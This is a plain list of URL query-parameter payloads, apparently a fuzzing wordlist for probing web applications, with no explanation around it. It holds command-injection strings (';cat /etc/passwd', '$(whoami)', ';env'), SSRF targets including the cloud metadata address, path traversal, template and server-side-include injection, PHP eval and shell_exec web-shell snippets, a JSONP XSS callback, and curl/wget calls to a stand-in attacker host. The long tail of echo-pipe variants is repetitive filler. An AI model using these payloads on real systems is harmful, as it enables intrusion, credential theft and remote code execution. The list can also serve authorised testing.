?debug=true
?test=true
?trace=true
?format=json
?format=xml
?callback=test
?callback=alert(1)
?host=127.0.0.1
?host=localhost
?host=169.254.169.254
?host=internal
?host=../..../../../../../../../../../../../../../../../etc/passwd
?host=|whoami
?host=;whoami
?host=&&whoami
?host=$(whoami)
?host=`whoami`
?host={{7*7}}
?host=${7*7}
?host=#{7*7}
?host=<!--#exec cmd="whoami"-->
?host=<?php echo shell_exec('whoami'); ?>
?host=@eval($_GET['cmd']);
?host=;cat /etc/passwd
?host=;ls -la
?host=;id
?host=;uname -a
?host=;env
?host=;curl http://atckr.com
?host=;wget http://atckr.com
?host=;ping -c 1 atckr.com
?host=;sleep 10
?host=;echo 'test'
?host=;echo 'test' > /tmp/test.txt
?host=;echo 'test' | tee /tmp/test.txt
?host=;echo 'test' | base64
?host=;echo 'test' | md5sum
?host=;echo 'test' | sha256sum
?host=;echo 'test' | xxd
?host=;echo 'test' | hexdump
?host=;echo 'test' | od
?host=;echo 'test' | rev
?host=;echo 'test' | tr 'a-z' 'A-Z'
?host=;echo 'test' | sed 's/test/TEST/'
?host=;echo 'test' | awk '{print $1}'
?host=;echo 'test' | cut -c1-2
?host=;echo 'test' | grep 'test'
?host=;echo 'test' | wc -l
?host=;echo 'test' | sort
?host=;echo 'test' | uniq
?host=;echo 'test' | head -n 1
?host=;echo 'test' | tail -n 1
?host=;echo 'test' | xargs
?host=;echo 'test' | tee /dev/null
?host=;echo 'test' | tee /dev/stderr
?host=;echo 'test' | tee /dev/stdout
?host=;echo 'test' | tee /dev/fd/0
?host=;echo 'test' | tee /dev/fd/1
?host=;echo 'test' | tee /dev/fd/2
?host=;echo 'test' | tee /dev/fd/3
?host=;echo 'test' | tee /dev/fd/4
?host=;echo 'test' | tee /dev/fd/5
